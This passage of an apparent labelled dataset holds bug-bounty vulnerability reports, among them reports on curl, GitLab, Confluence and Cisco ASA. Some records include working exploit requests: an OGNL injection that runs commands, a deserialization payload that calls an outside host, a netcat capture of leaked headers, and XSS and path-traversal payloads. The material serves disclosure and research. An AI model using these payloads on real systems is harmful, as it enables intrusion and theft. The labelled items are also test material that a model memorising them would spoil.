/etc/passwd с IP адреса 95.213.212.220. При желании легко добивается до полноценного шелла.\n\nЕще раз обращаю внимание, что ССРФ в данном энвайронменте являются критично опасными, даже слепые, и напоминаю о репортах №1346760 и №1348109, сейчас там уже не работает даже просто ССРФ, но нет причин думать, что такая же техника не сработала бы.\n\n## Impact\n\nАтакующий может исполнять произвольные команды на сервере от имени пользователя www-data со всеми вытекающими последствиями.", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "fb379afed4befca710ae", "text": "[Violation of Secure Design Principles] Web Cache poisoning attack leads to User information Disclosure and more\n\nHello\n\nYour Web-Server is vulnerable to web cache poisoning attacks.\nThis means, that the attacker are able to get another user Information.\n\nIf you are logged in and visit this website (For example):\nhttps://www.lyst.com/shop/trends/mens-dress-shoes/blahblah.css\n\nThen the server will store the information in the cache, BUT with the logged in user information.\nA non-logged-in user can then visit this website and see the information contained therein.\n\nIn that case, this url: https://www.lyst.com/shop/trends/mens-dress-shoes/blahblah.css can be visited in Private Mode and still you will be shown as \"LOGGED IN\" and then check the Source code you will get your email, member id ,etc..\n\n\nSome informations about the attack:\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf\n\nThe screenshots with the steps are in the attachments.\n\n## Impact\n\nWeb cache poisoning attack can be used to steal user informations like email, name and member id which is important for the login security feature.", "source": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "6c67a08aa34719fa18e8", "text": "[Missing Required Cryptographic Step] CVE-2022-30115: HSTS bypass via trailing dot\n\ncurl allows users to load a HSTS cache which will cause curl to use HTTPS instead of HTTP given a HTTP URL for a given site specified in the HSTS cache.\n\nIf the trailing dot is used, the HSTS check will be bypassed.\n\nIf a user has a preloaded hsts.txt:\n`````` \n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\naccounts.google.com \"20230503 08:47:52\"\n`````` \n\nDoing the following:\n``````\ncurl --hsts hsts.txt http://accounts.google.com.\n``````\n\nWill cause accounts.google.com to be loaded over HTTP\n``````\n\n301 Moved\n

    301 Moved

    \nThe document has moved\nhere.\n\n``````\n\nThis issue has been raised in other HTTP clients before such as in https://bugs.chromium.org/p/chromium/issues/detail?id=461481 and https://www.mozilla.org/en-US/security/advisories/mfsa2015-13/\n\n## Impact\n\nHSTS bypass", "source": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "64193d3a5217fed80880", "text": "[Business Logic Errors] CVE-2023-23915: HSTS amnesia with --parallel\n\ncurl's HSTS cache saving behaves wrongly when multiple URLs are requested in parallel.\n\nUsing its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however surprisingly fail when multiple transfers are done in parallel as the HSTS cache file gets overwritten by the most recently completed transfer.\n\nA later HTTP-only transfer to the earlier host name would then not get upgraded properly to HSTS.\n\n## Impact\n\nBypass intended security control.", "source": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "72e750a26781a7f7e964", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\ncurl supports \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.\n\nThe use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.\n\n## Impact\n\nDenial of service", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "c9b705efef6a7597787c", "text": "[Improper Authentication - Generic] CVE-2022-22576: OAUTH2 bearer bypass in connection re-use\n\n## Summary:\nA cached connection authenticated with the OAUTH2 mechanisms can be reused by a subsequent request even if the bearer is not correct.\nThis affects SASL-enabled protcols: SMPTP(S), IMAP(S), POP3(S) and LDAP(S) (openldap only).\n\nAn application that can be accessed by more than one user (such as a webmail server) would be affected by this flaw.\n\n## Steps To Reproduce:\n`curl 'imap://server:port/path/;MAILINDEX=1' --login-options 'AUTH=OAUTHBEARER' -u user: --oauth2-bearer validbearer --next 'imap://server:port/path/;MAILINDEX=1' --login-options 'AUTH=OAUTHBEARER' -u user: --oauth2-bearer anything`\n\n## Supporting Material/References:\n * Patch 0001-url-check-sasl-additional-parameters-for-connection-.patch fixes this flaw.\n\nAs an alternative to apply the patch, use another (unused) password within each request: the second request in the command below will properly fail.\n`curl 'imap://server:port/path/;MAILINDEX=1' --login-options 'AUTH=OAUTHBEARER' -u user:dummy1 --oauth2-bearer validbearer --next 'imap://server:port/path/;MAILINDEX=1' --login-options 'AUTH=OAUTHBEARER' -u user:dummy2 --oauth2-bearer anything`\n\n## Impact\n\nAccess (read/write) unauthorized data", "source": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "70a9ae1bd31cc164b74b", "text": "[Improper Access Control - Generic] Sensitive files/ data exists post deletion of user account\n\nIn the latest android app ,I created an account in the name of geekysherlock1@gmail.com. \nAfter few activities,deleted the account . \nFiles containing user emails and tokens still exist.Relevant files not deleted upon deletion of account.\n\nContent of files post deletion of account:\ngeneric_x86:/data/data/com.nextcloud.client/shared_prefs # ls\nFirebaseAppHeartBeat.xml WebViewChromiumPrefs.xml com.google.android.gms.appid.xml com.nextcloud.client_preferences.xml migrations.xml variant-emoji-manager.xml\n\ngeneric_x86:/data/data/com.nextcloud.client/shared_prefs # cat com.nextcloud.client_preferences.xml\n\n\n \n geekysherlock1@gmail.com@us.cloudamo.com\n \n \n \n \n \n \n euwTiu9CT3CvQNHqNVZPIk:APA91bHqkGjFhx-BiCEH_NcRnaEvrp21tbxvjOKhHrQ1mUTCW3Dp46X90YinSDcjfVXytTcT9CLQBcrOv5J_EfSGM7GbZrZAyeKC1xOtgNBLkFeo4_EqX7LqVW-ezuG_rou1y2Ux8ah5\n \n /storage/emulated/0/Android/media/com.nextcloud.client\n \n /storage/emulated/0/Pictures\n \n\n\nImages folder\ngeneric_x86:/data/data/com.nextcloud.client/shared_prefs # cd /storage/emulated/0/Pictures\ngeneric_x86:/storage/emulated/0/Pictures # ls\n2131099731.jpg 2131099732.jpg 2131099733.jpg\n\n## Impact\n\nThis information could be misused as sensitive token related ,images,user related details exist inspite of user account being deleted.", "source": "hackerone", "timestamp": "2022-05-20", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "6b550130780559213df2", "text": "SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Disconnect Webmonitor User (DoS)\n\nSeverity: medium", "source": "zeroscience", "timestamp": "2022-12-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "4b7ca2677ad3826b6c9c", "text": "[OS Command Injection] RCE in ███ [CVE-2021-26084]\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n\n## System Host(s)\n██████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-26084\n\n## Steps to Reproduce\nPOST\n(command cat /etc/passwd)\n```\nPOST /confluence/pages/doenterpagevariables.action HTTP/1.1\nHost: ████\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36\nAccept-Encoding: gzip\nContent-Length: 915\n\nqueryString=aaaaaaaa\\u0027%2b{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var+isWin+%3d+java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022)%3b+var+cmd+%3d+new+java.lang.String(\\u0022cat /etc/passwd\\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\\u0022cmd.exe\\u0022,+\\u0022/c\\u0022,+cmd)%3b+}+else{p.command(\\u0022bash\\u0022,+\\u0022-c\\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\\u0022\\u0022%3b+var+output+%3d+\\u0022\\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\\u0027)}%2b\\u0027\n\n```\n\nYou will see the output of the ifconfig command\n\nOUTPUT\n```\n type=\"hidden\"\n name=\"queryString\" value=\"aaaaaaaa[root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nconfluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash\n]\" /> \n```\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "edc991d4e2da3bfaa822", "text": "[Unknown] Yet another SSRF query for Javascript\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "0f1532069b9edf834097", "text": "MiniDVBLinux 5.4 Change Root Password PoC\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2022-10-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ca91b083dd342d275fbd", "text": "[Privilege Escalation] Subdomain takeover at http://test.www.midigator.com\n\n## Vulnerability\nSubdomain test.www.midigator.com points to an AWS S3 bucket that no longer exists. I was able to take control of this bucket and serve my own content on it.\n\n## Proof Of Concept\n```code\n$ dig test.www.midigator.com\n[snipped]\n;; ANSWER SECTION:\ntest.www.midigator.com.\t60\tIN\tCNAME\ttest.www.midigator.com.s3-website-us-west-1.amazonaws.com.\ntest.www.midigator.com.s3-website-us-west-1.amazonaws.com. 59 IN CNAME s3-website-us-west-1.amazonaws.com.\ns3-website-us-west-1.amazonaws.com. 4 IN A\t52.219.193.3\n```\n\n{F1963195}\n\n## Remediation\nRemove the CNAME entry for the `test.www.midigator.com`\n\n## Impact\n\nSubdomain Takeover", "source": "hackerone", "timestamp": "2022-11-12", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "4ecda6b5ba90214981cb", "text": "[Cross-site Scripting (XSS) - Stored] STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor [HtUS]\n\nWhile looking through the source code of https://████████/nlc/login.aspx,I noticed this line (204):\n` Cancel` ,which exposes the **edit** GET parameter.\nUpon accessing https://█████████/nlc/login.aspx?edit=true ,a hidden markdown editor will be revealed if you click around where the bottom text is,which allow us to input our own text,upload images,and pretty much anything you can do in markdown. \n████████ \nAs you can see to prove impact,I inputted an XSS payload(`svg/onload=alert(1)>`) and clicked on **Save**.\nAfter that whenever **anyone** accesses https://██████████/nlc/login.aspx ,the XSS payload will execute. \n███████ \nThe only way to remove the XSS payload is through accessing the markdown editor through https://█████████/nlc/login.aspx?edit=true ,removing it,and saving it.\n\n## Impact\n\nUsing this,an attacker is able to input and execute his own javascript code that will execute on **everyone** that accesses the login page **every time**,no matter what device they're using.They are not limited to Stored XSS though,using the hidden markdown editor they're able to upload images,deface the website and basically anything you can using markdown,however the most impactful scenario being executing arbitrary javascript code.", "source": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cdc2ffa861021ca149ea", "text": "[Improper Access Control - Generic] Unauthorized access\n\nHello Gents,\nI would like to report an issue where attackers are able to:\n1. List `about.gitlab.com` GS bucket.\n2. Access all resales through https://about.gitlab.com/all-releases.xml & https://about.gitlab.com/security-releases.xml, which contains undisclosed HackerOne reports.\n> For Example:\n```\n

    This vulnerability has been discovered internally by the GitLab team.

    Pipeline subscriptions trigger new pipelines with the wrong author

    \n

    A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, 9.9). It is now mitigated in the latest release and is assigned CVE-2022-2185.

    Thanks vakzz\n```\n3. Access https://about.gitlab.com/mindmap.txt which contains this internal Google Documents link:\nhttps://docs.google.com/document/d/e/2PACX-1vSNzTLkZMqILVYoey4dnSLYdk0Jmsd8pFu7ygLJ57RQ1c8XlZDbzaG45rQMOrDbHRWCQa5LN7DZid8s/pub\n> I didn't dig in so much , but I was able to edit a document like this one: \n> [GitLab_MessageGuide](https://docs.google.com/document/d/14APaSKwYpwutujISnkbLOnjdQ5RG-hIQXulasZT7h6s/edit)\n4. list All Gitlab Staff full names through https://about.gitlab.com/roulette.json\n5. All JavaScript files using `gsutil ls gs://about.gitlab.com/javascripts/`, there are many other files too.\n> Also please take a look at this json file: https://storage.googleapis.com/about.gitlab.com/_nuxt/content/db-0881eaf3.json, it contains phone numbers, tokens, and more than 1000 URLs could be useful for attackers.\n\n### Steps to reproduce:\n+ Please visit https://storage.googleapis.com/about.gitlab.com, or you can install [gsutil](https://cloud.google.com/storage/docs/gsutil_install). then list the bucket using the following command: \n+ `gsutil ls gs://about.gitlab.com/`.\n\n### Proof of concept\n+ {F1867120}\n+ {F1867121}\n+ {F1867122}\n+ {F1867125}\n\n## Impact\n\nUnauthorized access & Information disclosure.\n\nThanks and have a nice day!", "source": "hackerone", "timestamp": "2022-08-25", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "bce16ee2e64c8ea070eb", "text": "[Insecure Direct Object Reference (IDOR)] IDOR in \"external status check\" API leaks data about any status check on the instance\n\n### Summary\n\nThe API endpoint for returning approval from an `external status check` contains an IDOR that lets a user list information about all `external status checks` on the GitLab instance. The feature is an `Ultimate` feature, but can be accessed by starting an `Ultimate` trial on GitLab.com. So the attack is possible with a regular account.\n\nWhen an `external status check` is configured, the project will send out information about MRs to a specified endpoint. This endpoint can then be configured to answer to the request to \"pass\" the status check. Description of the feature [here](https://docs.gitlab.com/ee/user/project/merge_requests/status_checks.html). The API endpoint for this answer is ([info](https://docs.gitlab.com/ee/api/status_checks.html#set-status-of-an-external-status-check))\n```\nPOST /projects/:id/merge_requests/:merge_request_iid/status_check_responses\n```\nwith the passed in parameters `sha` and `external_status_check_id`. It is the later one that contains the IDOR. This parameter tells GitLab which `external status check` the request is targeting. And the answer back from GitLab is JSON containing info about the MR but also info about the status check configuration. By altering the ID sent, a user can obtain info about any status check on the instance (even from Private projects).\n\nLeaked information about a status check could look like the example below and could contain:\n\n* Private project name and ID\n* Name of status check\n* Private address to external status check tool\n* Name and ID of protected branch connected to the status check\n* Access rules to protected branch, if configured also name of user that is allowed to access\n\n```\n\"external_status_check\": {\n \"id\": 10,\n \"name\": \"Name of status check\",\n \"project_id\": 33,\n \"external_url\": \"https://victim.service.com\",\n \"protected_branches\": [\n {\n \"id\": 24,\n \"name\": \"Name of protected branch\",\n \"push_access_levels\": [\n {\n \"access_level\": 40,\n \"access_level_description\": \"Name of user with access to protected branch\",\n \"user_id\": 2,\n \"group_id\": null\n },\n {\n \"access_level\": 30,\n \"access_level_description\": \"Developers + Maintainers\",\n \"user_id\": null,\n \"group_id\": null\n }\n ],\n \"merge_access_levels\": [\n {\n \"access_level\": 30,\n \"access_level_description\": \"Developers + Maintainers\",\n \"user_id\": null,\n \"group_id\": null\n },\n {\n \"access_level\": 40,\n \"access_level_description\": \"Name of user with access\",\n \"user_id\": 2,\n \"group_id\": null\n }\n ],\n \"allow_force_push\": true,\n \"unprotect_access_levels\": [],\n \"code_owner_approval_required\": true\n }\n```\n\n### Steps to reproduce\n\n1. Create two users `victim01` and `attacker01`\n2. Log in as `victim01` and create a new PRIVATE project called `victim_project` at https://gitlab.domain.com/projects/new#blank_project\n3. Go to go to project settings https://gitlab.domain.com/victim01/victim_project/edit and expand \"Merge request\" under \"General\". Scroll down to \"Status checks\" and click create new.\n4. Name the status check \"Victim status check\" and enter a API endpoint \"https://victim.hidden.com\"\n5. Click save\n6. Log out and log back in as `attacker01`\n7. Go through step 2 to 5 again but name the project `attacker_project` and the status check anything. Take a note of the ID of the project. We will call it `attackID`\n8. Now create a new branch in `attacker_project` at https://gitlab.domain.com/attacker01/attacker_project/-/branches/new\n9. Click \"Create new merge request\" when the branch is created. Name the MR anything and click create\n10. Go to https://gitlab.domain.com/-/profile/personal_access_tokens and create an access token for `attacker01`, we will call it `TOK", "source": "hackerone", "timestamp": "2022-02-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ecd30b0dfeb07ce47c1d", "text": "[Code Injection] Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)\n\nRCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.\n\n\n### Supporting Material/References\n- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\n\n## Impact\n\nAn unauthenticated, 3rd-party attacker or adversary can execute remote code\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-35464\n\n## Steps to Reproduce\n## Steps To Reproduce\n\nTarget domain: ████\n\nFirst we need to build the payload:\n1. Download this jar file \n``wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar``\n\nthen \n``java -jar ysoserial-master-SNAPSHOT.jar Click1 \"curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net\" | (echo -ne \\\\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\\n' > payload.txt`` \n\nYou need to change the burp Collaborator id to test it properly. \n\nThe payload is now saved in the payload.txt file. \n\nNow we need to use the following request:\n\n```\nGET /openam/ccversion/Version?jato.pageSession=XYZ HTTP/1.1\nHost: 127.0.0.1\n```\nReplace **XYZ** by the payload saved into the payload.txt file. \n\nThe response\n\n```\nHTTP/1.1 302 Found\nCache-Control: private\nLocation: https://127.0.0.1:443/openam/base/AMInvalidURL\nContent-Length: 0\n```\nThe HTTP Request sent the collaborator :\n\n██████\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e2434770e19ff2d8564e", "text": "[Command Injection - Generic] Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances\n\n> *NOTE*: I am still researching whether there is a possibility to deploy the exploit without user interaction.\n\n### Summary\n\nGitLab provides a [rich representation](https://docs.gitlab.com/ee/user/project/repository/jupyter_notebooks/) for Jupyter Notebooks (`*.ipynb`). In turn, Jupyter Notebooks provide the possibility for [rich output via HTML](https://nbviewer.jupyter.org/github/ipython/ipython/blob/master/examples/IPython%20Kernel/Rich%20Output.ipynb#HTML). Although most tags and attributes are stripped from the HTML output rendered in GitLab's rich representation, it retains `data-*` attributes. Using [`jquery-ujs`](https://gitlab.com/gitlab-org/gitlab/-/blob/4e12f87c013f59070bf1156bb2427af9fa9123c4/package.json#L101) as a gadget, it is possible to trigger `GET`/`POST`/`PUT`/`DELETE` requests with an [arbitrary payload](https://github.com/rails/jquery-ujs/wiki/Unobtrusive-scripting-support-for-jQuery-%28list-of-data-attributes%29#data-params). On https://gitlab.com, the CSP restricts the target, while there is no such limitation for self-hosted GitLab instances. As of now, this vulnerability requires user interaction in the form of a single click followed by and applies to https://gitlab.com as well as self-hosted GitLab instances.\n\n### Steps to reproduce\n\n1. Create a GitLab project or refer to an existing project.\n2. Upload an `exploit.ipynb` file with the following contents:\n\n ```json\n {\n \"cells\": [\n {\n \"metadata\": { \"trusted\": true },\n \"cell_type\": \"code\",\n \"source\": \"Tell me something about you!\",\n \"execution_count\": 1,\n \"outputs\": [\n {\n \"output_type\": \"display_data\",\n \"data\": {\n \"text/plain\": \"\",\n \"text/html\": \"What's your favorite color? \\n\"\n },\n \"metadata\": {}\n }\n ]\n }\n ],\n \"metadata\": {\n \"kernelspec\": {\n \"name\": \"python3\",\n \"display_name\": \"Python 3\",\n \"language\": \"python\"\n },\n \"language_info\": {\n \"name\": \"python\",\n \"version\": \"3.7.8\",\n \"mimetype\": \"text/x-python\",\n \"codemirror_mode\": { \"name\": \"ipython\", \"version\": 3 },\n \"pygments_lexer\": \"ipython3\",\n \"nbconvert_exporter\": \"python\",\n \"file_extension\": \".py\"\n }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 4\n }\n ```\nwhere `cells[0].outputs[0].data.text/html` contains the payload.\n3. In the *Files* view of the project, click on the above-added `exploit.ipynb`.\n4. Select an option other than the default.\n5. Reload the page to recongize that your status has been altered, i.e. click on your profile in the top right corner.\n\n### Impact\n\nAn attacker is able to send `GET`/`POST`/`PUT`/`DELETE` requests with an [arbitrary payload](https://github.com/rails/jquery-ujs/wiki/Unobtrusive-scripting-support-for-jQuery-%28list-of-data-attributes%29#data-params) to targets within the CSP on https://gitlab.com or arbitrary targets on self-hosted GitLab instances on behalf of the victim.\n\nThe impact is similar to that of #824689 and #806571.\n\n### Examples\n\nDue to the destructive nature of the above-described example, I do not provide a public PoC, although I have created [an exemplary repository](https://gitlab.com/dpfuerst/sending-arbitrary-requests-through-jupyter-notebooks). This repository is private, please let me know if you would like me to change the visibility.\n\nThe above-described `exploit.ipynb` [sets the user status](https://docs.gitlab.com/ee/api/users.html#set-user-status) of the victim to `p0wn3d`. However, more critical permission-related exploits are also possible. Consider an attacker with", "source": "hackerone", "timestamp": "2022-02-10", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8bbeae0f23509b637325", "text": "[Path Traversal] Unathenticated file read (CVE-2020-3452)\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\nhttps://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/\n\n## Impact\n\nImpact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n1.) Perform the following GET request:\nGET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1\nHost: ██████\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F\nConnection: close\nAccept: */*\nAccept-Language: en\nAccept-Encoding: gzip, deflate, br\n\n2.) The response will contain contents of portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nCisco has released software updates that address this vulnerability.", "source": "hackerone", "timestamp": "2023-11-17", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "0393f5d9c51f55c4aa13", "text": "[Code Injection] HTML injection on newsroom.snap.com/* via search?q=1\n\nHi security team members,\n\nHope you are well!\n\nI found an unauthenticated HTML injection in the browser of NewRooms section: https://newsroom.snap.com/[code_country]/*. It is possible to inject any HTML code from the \"?q=\" parameter of the following endpoints newsroom.snap.com/[code_country]/search?q= since the text input in the search engine is not sanitized at all.\n\nThe steps to reproduce the attack are:\n\n1. Inject any HTML code into the URL: https://newsroom.snap.com/es-ES/search?q=%3Ca%20style=%22position:absolute;margin:50px;%20background-color:%20yellow;%20z-index:1000;top:50px;padding:100px;font-weight:bold;font-size:45px;color:red;%22%20href=%22https://evil.com%22%3EClick%20here%20for%20win%201000%E2%82%AC!%3C/a%3E\n\n2. In this PoC example, an attacker would send this seemingly legitimate URL to victims pretending that Snapchat is offering money as an excuse. In reality, these users would access the attacker's website (https://evil.com/) if they click on the element.\n\n## Impact\n\nAn attacker can inject as much HTML code as desired and edit the style of the website to cause a Defacement in order to deceive users through Phishing, links to other websites controlled by the attacker through scams,... . There are many scenarios .", "source": "hackerone", "timestamp": "2023-08-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "61e3f8cd17d76fd5997f", "text": "[Unknown] CVE-2023-36617: ReDoS vulnerability in URI (Ruby)\n\nI made a report at https://hackerone.com/reports/1958260 .\n\nhttps://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/\n\n> A ReDoS issue was discovered in the URI component through 0.12.1 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb.\n\n> NOTE: this issue exists because of an incomplete fix for CVE-2023-28755.\n\n## Impact\n\nParsing of URIs may cause ReDoS.\nEspecially when using RFC2396_Parser, even Ruby 3.2.x is affected.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "8d1896c4a0e5cc587cdd", "text": "[Insufficiently Protected Credentials] CVE-2022-27776: Auth/cookie leak on redirect\n\n## Summary:\nCurl can be coaxed to leak Authorisation / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).\n\n## Steps To Reproduce:\n\n1. Configure for example Apache2 to perform redirect with mod_rewrite:\n ```\n RewriteCond %{HTTP_USER_AGENT} \"^curl/\"\n RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]\n ```\n ... the attacker could also use `.htpasswd` file to do so.\n 2. Set up netcat to listen for the incoming secrets:\n `while true; do echo -ne 'HTTP/1.1 404 nope\\r\\nContent-Length: 0\\r\\n\\r\\n' | nc -v -l -p 9999; done`\n 3. `curl-L -H \"Authorization: secrettoken\" -H \"Cookie: secretcookie\" https://hostname.tld/redirectpoc`\n \nThe redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:\n```\nGET / HTTP/1.1\nHost: hostname.tld:9999\nUser-Agent: curl/7.83.0-DEV\nAccept: */*\nAuthorization: secrettoken\nCookie: secretcookie\n```\n\nThe attack could also use HTTPS and a valid certificate, In this case the leaked headers are of course only be visible to the listening http server.\n\nThis vulnerability is quite similar to CVE-2022-27774 and the fix is similar too: If the protocol or port number differs from the original request strip the Authorization and Cookie headers.\n\nThis bug appears to be here: https://github.com/curl/curl/blob/master/lib/http.c#L1904\n\n## Impact\n\nLeak of Authorisation and/or Cookie headers.", "source": "hackerone", "timestamp": "2022-04-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3095b69f91d2d8255da6", "text": "[Time-of-check Time-of-use (TOCTOU) Race Condition] [curl] CVE-2023-32001: fopen race condition\n\nHello, I'm reporting for CVE-2023-32001 on curl which was resolved in last Wednesday's curl release.\n\n### Vulnerability explanation: \nAs we can see in the following curl code (line 59-61 https://github.com/curl/curl/blob/fb802b521af997230b65174a559f5c419520e142/lib/fopen.c ): \n```C\n if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {\n /* a non-regular file, fallback to direct fopen() */\n *fh = fopen(filename, FOPEN_WRITETEXT);\n...\n}\n...\n```\nThere is a race condition between the moment \"stat(filename, &sb)\" is executed and the moment \" fopen(filename, FOPEN_WRITETEXT);\" is executed.\nThis leads to undesirable behavior such as an attacker tricking a privileged user to overwrite protected files, or since this function 